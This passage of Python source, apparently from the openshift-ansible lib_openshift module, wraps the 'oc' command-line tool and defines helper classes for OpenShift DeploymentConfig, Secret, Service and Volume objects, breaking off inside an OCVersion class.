class OpenShiftCLIError(Exception):
    '''Exception class for openshiftcli'''
    pass


ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]


def locate_oc_binary():
    ''' Find and return oc binary file '''
    # https://github.com/openshift/openshift-ansible/issues/3410
    # oc can be in /usr/local/bin in some cases, but that may not
    # be in $PATH due to ansible/sudo
    paths = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS

    oc_binary = 'oc'

    # Use shutil.which if it is available, otherwise fallback to a naive path search
    try:
        which_result = shutil.which(oc_binary, path=os.pathsep.join(paths))
        if which_result is not None:
            oc_binary = which_result
    except AttributeError:
        for path in paths:
            if os.path.exists(os.path.join(path, oc_binary)):
                oc_binary = os.path.join(path, oc_binary)
                break

    return oc_binary


# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
    ''' Class to wrap the command line tools '''
    def __init__(self,
                 namespace,
                 kubeconfig='/etc/origin/master/admin.kubeconfig',
                 verbose=False,
                 all_namespaces=False):
        ''' Constructor for OpenshiftCLI '''
        self.namespace = namespace
        self.verbose = verbose
        self.kubeconfig = Utils.create_tmpfile_copy(kubeconfig)
        self.all_namespaces = all_namespaces
        self.oc_binary = locate_oc_binary()

    # Pylint allows only 5 arguments to be passed.
    # pylint: disable=too-many-arguments
    def _replace_content(self, resource, rname, content, force=False, sep='.'):
        ''' replace the current object with the content '''
        res = self._get(resource, rname)
        if not res['results']:
            return res

        fname = Utils.create_tmpfile(rname + '-')

        yed = Yedit(fname, res['results'][0], separator=sep)
        changes = []
        for key, value in content.items():
            changes.append(yed.put(key, value))

        if any([change[0] for change in changes]):
            yed.write()

            atexit.register(Utils.cleanup, [fname])

            return self._replace(fname, force)

        return {'returncode': 0, 'updated': False}

    def _replace(self, fname, force=False):
        '''replace the current object with oc replace'''
        # We are removing the 'resourceVersion' to handle
        # a race condition when modifying oc objects
        yed = Yedit(fname)
        results = yed.delete('metadata.resourceVersion')
        if results[0]:
            yed.write()

        cmd = ['replace', '-f', fname]
        if force:
            cmd.append('--force')
        return self.openshift_cmd(cmd)

    def _create_from_content(self, rname, content):
        '''create a temporary file and then call oc create on it'''
        fname = Utils.create_tmpfile(rname + '-')
        yed = Yedit(fname, content=content)
        yed.write()

        atexit.register(Utils.cleanup, [fname])

        return self._create(fname)

    def _create(self, fname):
        '''call oc create on a filename'''
        return self.openshift_cmd(['create', '-f', fname])

    def _delete(self, resource, name=None, selector=None):
        '''call oc delete on a resource'''
        cmd = ['delete', resource]
        if selector is not None:
            cmd.append('--selector={}'.format(selector))
        elif name is not None:
            cmd.append(name)
        else:
            raise OpenShiftCLIError('Either name or selector is required when calling delete.')

        return self.openshift_cmd(cmd)

    def _process(self, template_name, create=False, params=None, template_data=None):  # noqa: E501
        '''process a template

           template_name: the name of the template to process
           create: whether to send to oc create after processing
           params: the parameters for the template
           template_data: the incoming template's data; instead of a file
        '''
        cmd = ['process']
        if template_data:
            cmd.extend(['-f', '-'])
        else:
            cmd.append(template_name)
        if params:
            param_str = ["{}={}".format(key, str(value).replace("'", r'"')) for key, value in params.items()]
            cmd.append('-v')
            cmd.extend(param_str)

        results = self.openshift_cmd(cmd, output=True, input_data=template_data)

        if results['returncode'] != 0 or not create:
            return results

        fname = Utils.create_tmpfile(template_name + '-')
        yed = Yedit(fname, results['results'])
        yed.write()

        atexit.register(Utils.cleanup, [fname])

        return self.openshift_cmd(['create', '-f', fname])

    def _get(self, resource, name=None, selector=None):
        '''return a resource by name '''
        cmd = ['get', resource]
        if selector is not None:
            cmd.append('--selector={}'.format(selector))
        elif name is not None:
            cmd.append(name)

        cmd.extend(['-o', 'json'])

        rval = self.openshift_cmd(cmd, output=True)

        # Ensure results are retuned in an array
        if 'items' in rval:
            rval['results'] = rval['items']
        elif not isinstance(rval['results'], list):
            rval['results'] = [rval['results']]

        return rval

    def _schedulable(self, node=None, selector=None, schedulable=True):
        ''' perform oadm manage-node scheduable '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector={}'.format(selector))

        cmd.append('--schedulable={}'.format(schedulable))

        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')  # noqa: E501

    def _list_pods(self, node=None, selector=None, pod_selector=None):
        ''' perform oadm list pods

            node: the node in which to list pods
            selector: the label selector filter if provided
            pod_selector: the pod selector filter if provided
        '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector={}'.format(selector))

        if pod_selector:
            cmd.append('--pod-selector={}'.format(pod_selector))

        cmd.extend(['--list-pods', '-o', 'json'])

        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')

    # pylint: disable=too-many-arguments
    def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
        ''' perform oadm manage-node evacuate '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector={}'.format(selector))

        if dry_run:
            cmd.append('--dry-run')

        if pod_selector:
            cmd.append('--pod-selector={}'.format(pod_selector))

        if grace_period:
            cmd.append('--grace-period={}'.format(int(grace_period)))

        if force:
            cmd.append('--force')

        cmd.append('--evacuate')

        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')

    def _version(self):
        ''' return the openshift version'''
        return self.openshift_cmd(['version'], output=True, output_type='raw')

    def _import_image(self, url=None, name=None, tag=None):
        ''' perform image import '''
        cmd = ['import-image']

        image = '{0}'.format(name)
        if tag:
            image += ':{0}'.format(tag)

        cmd.append(image)

        if url:
            cmd.append('--from={0}/{1}'.format(url, image))

        cmd.append('-n{0}'.format(self.namespace))

        cmd.append('--confirm')
        return self.openshift_cmd(cmd)

    def _run(self, cmds, input_data):
        ''' Actually executes the command. This makes mocking easier. '''
        curr_env = os.environ.copy()
        curr_env.update({'KUBECONFIG': self.kubeconfig})
        proc = subprocess.Popen(cmds,
                                stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                env=curr_env)

        stdout, stderr = proc.communicate(input_data)

        return proc.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')

    # pylint: disable=too-many-arguments,too-many-branches
    def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
        '''Base command for oc '''
        cmds = [self.oc_binary]

        if oadm:
            cmds.append('adm')

        cmds.extend(cmd)

        if self.all_namespaces:
            cmds.extend(['--all-namespaces'])
        elif self.namespace is not None and self.namespace.lower() not in ['none', 'emtpy']:  # E501
            cmds.extend(['-n', self.namespace])

        rval = {}
        results = ''
        err = None

        if self.verbose:
            print(' '.join(cmds))

        try:
            returncode, stdout, stderr = self._run(cmds, input_data)
        except OSError as ex:
            returncode, stdout, stderr = 1, '', 'Failed to execute {}: {}'.format(subprocess.list2cmdline(cmds), ex)

        rval = {"returncode": returncode,
                "results": results,
                "cmd": ' '.join(cmds)}

        if returncode == 0:
            if output:
                if output_type == 'json':
                    try:
                        rval['results'] = json.loads(stdout)
                    except ValueError as verr:
                        if "No JSON object could be decoded" in verr.args:
                            err = verr.args
                elif output_type == 'raw':
                    rval['results'] = stdout

            if self.verbose:
                print("STDOUT: {0}".format(stdout))
                print("STDERR: {0}".format(stderr))

            if err:
                rval.update({"err": err,
                             "stderr": stderr,
                             "stdout": stdout,
                             "cmd": cmds})

        else:
            rval.update({"stderr": stderr,
                         "stdout": stdout,
                         "results": {}})

        return rval


class Utils(object):  # pragma: no cover
    ''' utilities for openshiftcli modules '''

    @staticmethod
    def _write(filename, contents):
        ''' Actually write the file contents to disk. This helps with mocking. '''

        with open(filename, 'w') as sfd:
            sfd.write(contents)

    @staticmethod
    def create_tmp_file_from_contents(rname, data, ftype='yaml'):
        ''' create a file in tmp with name and contents'''

        tmp = Utils.create_tmpfile(prefix=rname)

        if ftype == 'yaml':
            # AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
            # pylint: disable=no-member
            if hasattr(yaml, 'RoundTripDumper'):
                Utils._write(tmp, yaml.dump(data, Dumper=yaml.RoundTripDumper))
            else:
                Utils._write(tmp, yaml.safe_dump(data, default_flow_style=False))

        elif ftype == 'json':
            Utils._write(tmp, json.dumps(data))
        else:
            Utils._write(tmp, data)

        # Register cleanup when module is done
        atexit.register(Utils.cleanup, [tmp])
        return tmp

    @staticmethod
    def create_tmpfile_copy(inc_file):
        '''create a temporary copy of a file'''
        tmpfile = Utils.create_tmpfile('lib_openshift-')
        Utils._write(tmpfile, open(inc_file).read())

        # Cleanup the tmpfile
        atexit.register(Utils.cleanup, [tmpfile])

        return tmpfile

    @staticmethod
    def create_tmpfile(prefix='tmp'):
        ''' Generates and returns a temporary file name '''

        with tempfile.NamedTemporaryFile(prefix=prefix, delete=False) as tmp:
            return tmp.name

    @staticmethod
    def create_tmp_files_from_contents(content, content_type=None):
        '''Turn an array of dict: filename, content into a files array'''
        if not isinstance(content, list):
            content = [content]
        files = []
        for item in content:
            path = Utils.create_tmp_file_from_contents(item['path'] + '-',
                                                       item['data'],
                                                       ftype=content_type)
            files.append({'name': os.path.basename(item['path']),
                          'path': path})
        return files

    @staticmethod
    def cleanup(files):
        '''Clean up on exit '''
        for sfile in files:
            if os.path.exists(sfile):
                if os.path.isdir(sfile):
                    shutil.rmtree(sfile)
                elif os.path.isfile(sfile):
                    os.remove(sfile)

    @staticmethod
    def exists(results, _name):
        ''' Check to see if the results include the name '''
        if not results:
            return False

        if Utils.find_result(results, _name):
            return True

        return False

    @staticmethod
    def find_result(results, _name):
        ''' Find the specified result by name'''
        rval = None
        for result in results:
            if 'metadata' in result and result['metadata']['name'] == _name:
                rval = result
                break

        return rval

    @staticmethod
    def get_resource_file(sfile, sfile_type='yaml'):
        ''' return the service file '''
        contents = None
        with open(sfile) as sfd:
            contents = sfd.read()

        if sfile_type == 'yaml':
            # AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
            # pylint: disable=no-member
            if hasattr(yaml, 'RoundTripLoader'):
                contents = yaml.load(contents, yaml.RoundTripLoader)
            else:
                contents = yaml.safe_load(contents)
        elif sfile_type == 'json':
            contents = json.loads(contents)

        return contents

    @staticmethod
    def filter_versions(stdout):
        ''' filter the oc version output '''

        version_dict = {}
        version_search = ['oc', 'openshift', 'kubernetes']

        for line in stdout.strip().split('\n'):
            for term in version_search:
                if not line:
                    continue
                if line.startswith(term):
                    version_dict[term] = line.split()[-1]

        # horrible hack to get openshift version in Openshift 3.2
        #  By default "oc version in 3.2 does not return an "openshift" version
        if "openshift" not in version_dict:
            version_dict["openshift"] = version_dict["oc"]

        return version_dict

    @staticmethod
    def add_custom_versions(versions):
        ''' create custom versions strings '''

        versions_dict = {}

        for tech, version in versions.items():
            # clean up "-" from version
            if "-" in version:
                version = version.split("-")[0]

            if version.startswith('v'):
                versions_dict[tech + '_numeric'] = version[1:].split('+')[0]
                # "v3.3.0.33" is what we have, we want "3.3"
                versions_dict[tech + '_short'] = version[1:4]

        return versions_dict

    @staticmethod
    def openshift_installed():
        ''' check if openshift is installed '''
        import yum

        yum_base = yum.YumBase()
        if yum_base.rpmdb.searchNevra(name='atomic-openshift'):
            return True

        return False

    # Disabling too-many-branches.  This is a yaml dictionary comparison function
    # pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
    @staticmethod
    def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
        ''' Given a user defined definition, compare it with the results given back by our query.  '''

        # Currently these values are autogenerated and we do not need to check them
        skip = ['metadata', 'status']
        if skip_keys:
            skip.extend(skip_keys)

        for key, value in result_def.items():
            if key in skip:
                continue

            # Both are lists
            if isinstance(value, list):
                if key not in user_def:
                    if debug:
                        print('User data does not have key [%s]' % key)
                        print('User data: %s' % user_def)
                    return False

                if not isinstance(user_def[key], list):
                    if debug:
                        print('user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key]))
                    return False

                if len(user_def[key]) != len(value):
                    if debug:
                        print("List lengths are not equal.")
                        print("key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value)))
                        print("user_def: %s" % user_def[key])
                        print("value: %s" % value)
                    return False

                for values in zip(user_def[key], value):
                    if isinstance(values[0], dict) and isinstance(values[1], dict):
                        if debug:
                            print('sending list - list')
                            print(type(values[0]))
                            print(type(values[1]))
                        result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
                        if not result:
                            print('list compare returned false')
                            return False

                    elif value != user_def[key]:
                        if debug:
                            print('value should be identical')
                            print(user_def[key])
                            print(value)
                        return False

            # recurse on a dictionary
            elif isinstance(value, dict):
                if key not in user_def:
                    if debug:
                        print("user_def does not have key [%s]" % key)
                    return False
                if not isinstance(user_def[key], dict):
                    if debug:
                        print("dict returned false: not instance of dict")
                    return False

                # before passing ensure keys match
                api_values = set(value.keys()) - set(skip)
                user_values = set(user_def[key].keys()) - set(skip)
                if api_values != user_values:
                    if debug:
                        print("keys are not equal in dict")
                        print(user_values)
                        print(api_values)
                    return False

                result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
                if not result:
                    if debug:
                        print("dict returned false")
                        print(result)
                    return False

            # Verify each key, value pair is the same
            else:
                if key not in user_def or value != user_def[key]:
                    if debug:
                        print("value not equal; user_def does not have key")
                        print(key)
                        print(value)
                        if key in user_def:
                            print(user_def[key])
                    return False

        if debug:
            print('returning true')
        return True

class OpenShiftCLIConfig(object):
    '''Generic Config'''
    def __init__(self, rname, namespace, kubeconfig, options):
        self.kubeconfig = kubeconfig
        self.name = rname
        self.namespace = namespace
        self._options = options

    @property
    def config_options(self):
        ''' return config options '''
        return self._options

    def to_option_list(self, ascommalist=''):
        '''return all options as a string
           if ascommalist is set to the name of a key, and
           the value of that key is a dict, format the dict
           as a list of comma delimited key=value pairs'''
        return self.stringify(ascommalist)

    def stringify(self, ascommalist=''):
        ''' return the options hash as cli params in a string
            if ascommalist is set to the name of a key, and
            the value of that key is a dict, format the dict
            as a list of comma delimited key=value pairs '''
        rval = []
        for key in sorted(self.config_options.keys()):
            data = self.config_options[key]
            if data['include'] \
               and (data['value'] or isinstance(data['value'], int)):
                if key == ascommalist:
                    val = ','.join(['{}={}'.format(kk, vv) for kk, vv in sorted(data['value'].items())])
                else:
                    val = data['value']
                rval.append('--{}={}'.format(key.replace('_', '-'), val))

        return rval


# -*- -*- -*- End included fragment: lib/base.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: lib/deploymentconfig.py -*- -*- -*-


# pylint: disable=too-many-public-methods
class DeploymentConfig(Yedit):
    ''' Class to model an openshift DeploymentConfig'''
    default_deployment_config = '''
apiVersion: v1
kind: DeploymentConfig
metadata:
  name: default_dc
  namespace: default
spec:
  replicas: 0
  selector:
    default_dc: default_dc
  strategy:
    resources: {}
    rollingParams:
      intervalSeconds: 1
      maxSurge: 0
      maxUnavailable: 25%
      timeoutSeconds: 600
      updatePercent: -25
      updatePeriodSeconds: 1
    type: Rolling
  template:
    metadata:
    spec:
      containers:
      - env:
        - name: default
          value: default
        image: default
        imagePullPolicy: IfNotPresent
        name: default_dc
        ports:
        - containerPort: 8000
          hostPort: 8000
          protocol: TCP
          name: default_port
        resources: {}
        terminationMessagePath: /dev/termination-log
      dnsPolicy: ClusterFirst
      hostNetwork: true
      nodeSelector:
        type: compute
      restartPolicy: Always
      securityContext: {}
      serviceAccount: default
      serviceAccountName: default
      terminationGracePeriodSeconds: 30
  triggers:
  - type: ConfigChange
'''

    replicas_path = "spec.replicas"
    env_path = "spec.template.spec.containers[0].env"
    volumes_path = "spec.template.spec.volumes"
    container_path = "spec.template.spec.containers"
    volume_mounts_path = "spec.template.spec.containers[0].volumeMounts"

    def __init__(self, content=None):
        ''' Constructor for deploymentconfig '''
        if not content:
            content = DeploymentConfig.default_deployment_config

        super(DeploymentConfig, self).__init__(content=content)

    def add_env_value(self, key, value):
        ''' add key, value pair to env array '''
        rval = False
        env = self.get_env_vars()
        if env:
            env.append({'name': key, 'value': value})
            rval = True
        else:
            result = self.put(DeploymentConfig.env_path, {'name': key, 'value': value})
            rval = result[0]

        return rval

    def exists_env_value(self, key, value):
        ''' return whether a key, value  pair exists '''
        results = self.get_env_vars()
        if not results:
            return False

        for result in results:
            if result['name'] == key and result['value'] == value:
                return True

        return False

    def exists_env_key(self, key):
        ''' return whether a key, value  pair exists '''
        results = self.get_env_vars()
        if not results:
            return False

        for result in results:
            if result['name'] == key:
                return True

        return False

    def get_env_var(self, key):
        '''return a environment variables '''
        results = self.get(DeploymentConfig.env_path) or []
        if not results:
            return None

        for env_var in results:
            if env_var['name'] == key:
                return env_var

        return None

    def get_env_vars(self):
        '''return a environment variables '''
        return self.get(DeploymentConfig.env_path) or []

    def delete_env_var(self, keys):
        '''delete a list of keys '''
        if not isinstance(keys, list):
            keys = [keys]

        env_vars_array = self.get_env_vars()
        modified = False
        idx = None
        for key in keys:
            for env_idx, env_var in enumerate(env_vars_array):
                if env_var['name'] == key:
                    idx = env_idx
                    break

            if idx:
                modified = True
                del env_vars_array[idx]

        if modified:
            return True

        return False

    def update_env_var(self, key, value):
        '''place an env in the env var list'''

        env_vars_array = self.get_env_vars()
        idx = None
        for env_idx, env_var in enumerate(env_vars_array):
            if env_var['name'] == key:
                idx = env_idx
                break

        if idx:
            env_vars_array[idx]['value'] = value
        else:
            self.add_env_value(key, value)

        return True

    def exists_volume_mount(self, volume_mount):
        ''' return whether a volume mount exists '''
        exist_volume_mounts = self.get_volume_mounts()

        if not exist_volume_mounts:
            return False

        volume_mount_found = False
        for exist_volume_mount in exist_volume_mounts:
            if exist_volume_mount['name'] == volume_mount['name']:
                volume_mount_found = True
                break

        return volume_mount_found

    def exists_volume(self, volume):
        ''' return whether a volume exists '''
        exist_volumes = self.get_volumes()

        volume_found = False
        for exist_volume in exist_volumes:
            if exist_volume['name'] == volume['name']:
                volume_found = True
                break

        return volume_found

    def find_volume_by_name(self, volume, mounts=False):
        ''' return the index of a volume '''
        volumes = []
        if mounts:
            volumes = self.get_volume_mounts()
        else:
            volumes = self.get_volumes()
        for exist_volume in volumes:
            if exist_volume['name'] == volume['name']:
                return exist_volume

        return None

    def get_replicas(self):
        ''' return replicas setting '''
        return self.get(DeploymentConfig.replicas_path)

    def get_volume_mounts(self):
        '''return volume mount information '''
        return self.get_volumes(mounts=True)

    def get_volumes(self, mounts=False):
        '''return volume mount information '''
        if mounts:
            return self.get(DeploymentConfig.volume_mounts_path) or []

        return self.get(DeploymentConfig.volumes_path) or []

    def delete_volume_by_name(self, volume):
        '''delete a volume '''
        modified = False
        exist_volume_mounts = self.get_volume_mounts()
        exist_volumes = self.get_volumes()
        del_idx = None
        for idx, exist_volume in enumerate(exist_volumes):
            if 'name' in exist_volume and exist_volume['name'] == volume['name']:
                del_idx = idx
                break

        if del_idx != None:
            del exist_volumes[del_idx]
            modified = True

        del_idx = None
        for idx, exist_volume_mount in enumerate(exist_volume_mounts):
            if 'name' in exist_volume_mount and exist_volume_mount['name'] == volume['name']:
                del_idx = idx
                break

        if del_idx != None:
            del exist_volume_mounts[idx]
            modified = True

        return modified

    def add_volume_mount(self, volume_mount):
        ''' add a volume or volume mount to the proper location '''
        exist_volume_mounts = self.get_volume_mounts()

        if not exist_volume_mounts and volume_mount:
            self.put(DeploymentConfig.volume_mounts_path, [volume_mount])
        else:
            exist_volume_mounts.append(volume_mount)

    def add_volume(self, volume):
        ''' add a volume or volume mount to the proper location '''
        exist_volumes = self.get_volumes()
        if not volume:
            return

        if not exist_volumes:
            self.put(DeploymentConfig.volumes_path, [volume])
        else:
            exist_volumes.append(volume)

    def update_replicas(self, replicas):
        ''' update replicas value '''
        self.put(DeploymentConfig.replicas_path, replicas)

    def update_volume(self, volume):
        '''place an env in the env var list'''
        exist_volumes = self.get_volumes()

        if not volume:
            return False

        # update the volume
        update_idx = None
        for idx, exist_vol in enumerate(exist_volumes):
            if exist_vol['name'] == volume['name']:
                update_idx = idx
                break

        if update_idx != None:
            exist_volumes[update_idx] = volume
        else:
            self.add_volume(volume)

        return True

    def update_volume_mount(self, volume_mount):
        '''place an env in the env var list'''
        modified = False

        exist_volume_mounts = self.get_volume_mounts()

        if not volume_mount:
            return False

        # update the volume mount
        for exist_vol_mount in exist_volume_mounts:
            if exist_vol_mount['name'] == volume_mount['name']:
                if 'mountPath' in exist_vol_mount and \
                   str(exist_vol_mount['mountPath']) != str(volume_mount['mountPath']):
                    exist_vol_mount['mountPath'] = volume_mount['mountPath']
                    modified = True
                break

        if not modified:
            self.add_volume_mount(volume_mount)
            modified = True

        return modified

    def needs_update_volume(self, volume, volume_mount):
        ''' verify a volume update is needed '''
        exist_volume = self.find_volume_by_name(volume)
        exist_volume_mount = self.find_volume_by_name(volume, mounts=True)
        results = []
        results.append(exist_volume['name'] == volume['name'])

        if 'secret' in volume:
            results.append('secret' in exist_volume)
            results.append(exist_volume['secret']['secretName'] == volume['secret']['secretName'])
            results.append(exist_volume_mount['name'] == volume_mount['name'])
            results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])

        elif 'emptyDir' in volume:
            results.append(exist_volume_mount['name'] == volume['name'])
            results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])

        elif 'persistentVolumeClaim' in volume:
            pvc = 'persistentVolumeClaim'
            results.append(pvc in exist_volume)
            if results[-1]:
                results.append(exist_volume[pvc]['claimName'] == volume[pvc]['claimName'])

                if 'claimSize' in volume[pvc]:
                    results.append(exist_volume[pvc]['claimSize'] == volume[pvc]['claimSize'])

        elif 'hostpath' in volume:
            results.append('hostPath' in exist_volume)
            results.append(exist_volume['hostPath']['path'] == volume_mount['mountPath'])

        return not all(results)

    def needs_update_replicas(self, replicas):
        ''' verify whether a replica update is needed '''
        current_reps = self.get(DeploymentConfig.replicas_path)
        return not current_reps == replicas

# -*- -*- -*- End included fragment: lib/deploymentconfig.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: lib/secret.py -*- -*- -*-

# pylint: disable=too-many-instance-attributes
class SecretConfig(object):
    ''' Handle secret options '''
    # pylint: disable=too-many-arguments
    def __init__(self,
                 sname,
                 namespace,
                 kubeconfig,
                 secrets=None):
        ''' constructor for handling secret options '''
        self.kubeconfig = kubeconfig
        self.name = sname
        self.namespace = namespace
        self.secrets = secrets
        self.data = {}

        self.create_dict()

    def create_dict(self):
        ''' assign the correct properties for a secret dict '''
        self.data['apiVersion'] = 'v1'
        self.data['kind'] = 'Secret'
        self.data['metadata'] = {}
        self.data['metadata']['name'] = self.name
        self.data['metadata']['namespace'] = self.namespace
        self.data['data'] = {}
        if self.secrets:
            for key, value in self.secrets.items():
                self.data['data'][key] = value

# pylint: disable=too-many-instance-attributes
class Secret(Yedit):
    ''' Class to wrap the oc command line tools '''
    secret_path = "data"
    kind = 'secret'

    def __init__(self, content):
        '''secret constructor'''
        super(Secret, self).__init__(content=content)
        self._secrets = None

    @property
    def secrets(self):
        '''secret property getter'''
        if self._secrets is None:
            self._secrets = self.get_secrets()
        return self._secrets

    @secrets.setter
    def secrets(self):
        '''secret property setter'''
        if self._secrets is None:
            self._secrets = self.get_secrets()
        return self._secrets

    def get_secrets(self):
        ''' returns all of the defined secrets '''
        return self.get(Secret.secret_path) or {}

    def add_secret(self, key, value):
        ''' add a secret '''
        if self.secrets:
            self.secrets[key] = value
        else:
            self.put(Secret.secret_path, {key: value})

        return True

    def delete_secret(self, key):
        ''' delete secret'''
        try:
            del self.secrets[key]
        except KeyError as _:
            return False

        return True

    def find_secret(self, key):
        ''' find secret'''
        rval = None
        try:
            rval = self.secrets[key]
        except KeyError as _:
            return None

        return {'key': key, 'value': rval}

    def update_secret(self, key, value):
        ''' update a secret'''
        if key in self.secrets:
            self.secrets[key] = value
        else:
            self.add_secret(key, value)

        return True

# -*- -*- -*- End included fragment: lib/secret.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: lib/service.py -*- -*- -*-


# pylint: disable=too-many-instance-attributes
class ServiceConfig(object):
    ''' Handle service options '''
    # pylint: disable=too-many-arguments
    def __init__(self,
                 sname,
                 namespace,
                 ports,
                 selector=None,
                 labels=None,
                 cluster_ip=None,
                 portal_ip=None,
                 session_affinity=None,
                 service_type=None,
                 external_ips=None):
        ''' constructor for handling service options '''
        self.name = sname
        self.namespace = namespace
        self.ports = ports
        self.selector = selector
        self.labels = labels
        self.cluster_ip = cluster_ip
        self.portal_ip = portal_ip
        self.session_affinity = session_affinity
        self.service_type = service_type
        self.external_ips = external_ips
        self.data = {}

        self.create_dict()

    def create_dict(self):
        ''' instantiates a service dict '''
        self.data['apiVersion'] = 'v1'
        self.data['kind'] = 'Service'
        self.data['metadata'] = {}
        self.data['metadata']['name'] = self.name
        self.data['metadata']['namespace'] = self.namespace
        if self.labels:
            self.data['metadata']['labels'] = {}
            for lab, lab_value in self.labels.items():
                self.data['metadata']['labels'][lab] = lab_value
        self.data['spec'] = {}

        if self.ports:
            self.data['spec']['ports'] = self.ports
        else:
            self.data['spec']['ports'] = []

        if self.selector:
            self.data['spec']['selector'] = self.selector

        self.data['spec']['sessionAffinity'] = self.session_affinity or 'None'

        if self.cluster_ip:
            self.data['spec']['clusterIP'] = self.cluster_ip

        if self.portal_ip:
            self.data['spec']['portalIP'] = self.portal_ip

        if self.service_type:
            self.data['spec']['type'] = self.service_type

        if self.external_ips:
            self.data['spec']['externalIPs'] = self.external_ips


# pylint: disable=too-many-instance-attributes,too-many-public-methods
class Service(Yedit):
    ''' Class to model the oc service object '''
    port_path = "spec.ports"
    portal_ip = "spec.portalIP"
    cluster_ip = "spec.clusterIP"
    selector_path = 'spec.selector'
    kind = 'Service'
    external_ips = "spec.externalIPs"

    def __init__(self, content):
        '''Service constructor'''
        super(Service, self).__init__(content=content)

    def get_ports(self):
        ''' get a list of ports '''
        return self.get(Service.port_path) or []

    def get_selector(self):
        ''' get the service selector'''
        return self.get(Service.selector_path) or {}

    def add_ports(self, inc_ports):
        ''' add a port object to the ports list '''
        if not isinstance(inc_ports, list):
            inc_ports = [inc_ports]

        ports = self.get_ports()
        if not ports:
            self.put(Service.port_path, inc_ports)
        else:
            ports.extend(inc_ports)

        return True

    def find_ports(self, inc_port):
        ''' find a specific port '''
        for port in self.get_ports():
            if port['port'] == inc_port['port']:
                return port

        return None

    def delete_ports(self, inc_ports):
        ''' remove a port from a service '''
        if not isinstance(inc_ports, list):
            inc_ports = [inc_ports]

        ports = self.get(Service.port_path) or []

        if not ports:
            return True

        removed = False
        for inc_port in inc_ports:
            port = self.find_ports(inc_port)
            if port:
                ports.remove(port)
                removed = True

        return removed

    def add_cluster_ip(self, sip):
        '''add cluster ip'''
        self.put(Service.cluster_ip, sip)

    def add_portal_ip(self, pip):
        '''add cluster ip'''
        self.put(Service.portal_ip, pip)

    def get_external_ips(self):
        ''' get a list of external_ips '''
        return self.get(Service.external_ips) or []

    def add_external_ips(self, inc_external_ips):
        ''' add an external_ip to the external_ips list '''
        if not isinstance(inc_external_ips, list):
            inc_external_ips = [inc_external_ips]

        external_ips = self.get_external_ips()
        if not external_ips:
            self.put(Service.external_ips, inc_external_ips)
        else:
            external_ips.extend(inc_external_ips)

        return True

    def find_external_ips(self, inc_external_ip):
        ''' find a specific external IP '''
        val = None
        try:
            idx = self.get_external_ips().index(inc_external_ip)
            val = self.get_external_ips()[idx]
        except ValueError:
            pass

        return val

    def delete_external_ips(self, inc_external_ips):
        ''' remove an external IP from a service '''
        if not isinstance(inc_external_ips, list):
            inc_external_ips = [inc_external_ips]

        external_ips = self.get(Service.external_ips) or []

        if not external_ips:
            return True

        removed = False
        for inc_external_ip in inc_external_ips:
            external_ip = self.find_external_ips(inc_external_ip)
            if external_ip:
                external_ips.remove(external_ip)
                removed = True

        return removed

# -*- -*- -*- End included fragment: lib/service.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: lib/volume.py -*- -*- -*-

class Volume(object):
    ''' Class to represent an openshift volume object'''
    volume_mounts_path = {"pod": "spec.containers[0].volumeMounts",
                          "dc":  "spec.template.spec.containers[0].volumeMounts",
                          "rc":  "spec.template.spec.containers[0].volumeMounts",
                         }
    volumes_path = {"pod": "spec.volumes",
                    "dc":  "spec.template.spec.volumes",
                    "rc":  "spec.template.spec.volumes",
                   }

    @staticmethod
    def create_volume_structure(volume_info):
        ''' return a properly structured volume '''
        volume_mount = None
        volume = {'name': volume_info['name']}
        volume_type = volume_info['type'].lower()
        if volume_type == 'secret':
            volume['secret'] = {}
            volume[volume_info['type']] = {'secretName': volume_info['secret_name']}
            volume_mount = {'mountPath': volume_info['path'],
                            'name': volume_info['name']}
        elif volume_type == 'emptydir':
            volume['emptyDir'] = {}
            volume_mount = {'mountPath': volume_info['path'],
                            'name': volume_info['name']}
        elif volume_type == 'pvc' or volume_type == 'persistentvolumeclaim':
            volume['persistentVolumeClaim'] = {}
            volume['persistentVolumeClaim']['claimName'] = volume_info['claimName']
            volume['persistentVolumeClaim']['claimSize'] = volume_info['claimSize']
        elif volume_type == 'hostpath':
            volume['hostPath'] = {}
            volume['hostPath']['path'] = volume_info['path']
        elif volume_type == 'configmap':
            volume['configMap'] = {}
            volume['configMap']['name'] = volume_info['configmap_name']
            volume_mount = {'mountPath': volume_info['path'],
                            'name': volume_info['name']}

        return (volume, volume_mount)

# -*- -*- -*- End included fragment: lib/volume.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: class/oc_version.py -*- -*- -*-


# pylint: disable=too-many-instance-attributes
class OCVersion(OpenShiftCLI):
    ''' Class to wrap the oc command line tools '''
    # pylint allows 5
    # pylint: disable=too-many-arguments
    def __init__(self,
                 config,
                 debug):
        ''' Constructor for OCVersion '''
        super(OCVersion, self).__init__(None, config)
        self.debug = debug

    def get(self):
        '''get and return version information '''

        results = {}

        version_results = self._version()

